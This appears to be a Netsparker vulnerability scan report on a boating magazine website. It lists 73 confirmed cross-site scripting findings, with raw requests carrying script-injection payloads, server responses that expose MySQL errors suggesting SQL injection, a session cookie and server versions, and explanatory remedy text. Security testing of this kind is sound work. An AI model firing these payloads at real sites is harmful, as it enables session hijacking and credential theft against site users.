<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span><..
Cross-site Scripting

Cross-site Scripting

73 TOTAL
IMPORTANT
CONFIRMED
73
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /archives

/archives CONFIRMED

http://www.soundingsonline.com/archives?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x001E2B..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001E2B)</script>

Request

GET /archives?'"--></style></script><script>netsparker(0x001E2B)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:26:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:26:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E2B)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E2B)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series</span></a></li><li class="item66"><a href="/more/digital-pub..
- /subscription-services/preview-current-issue

/subscription-services/preview-current-issue CONFIRMED

http://www.soundingsonline.com/subscription-services/preview-current-issue?'%22--%3E%3C/style%3E%3C/..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x001E97)</script>

Request

GET /subscription-services/preview-current-issue?'"--></style></script><script>netsparker(0x001E97)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:27:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:27:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E97)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x001E97)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/subscription-services/preview-current-issue" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Preview Current Issue- See Next Month's table of Contents Before Newsstands</title> <link href="/subscription-services/preview-current-issue?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/subscription-services/preview-current-issue?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
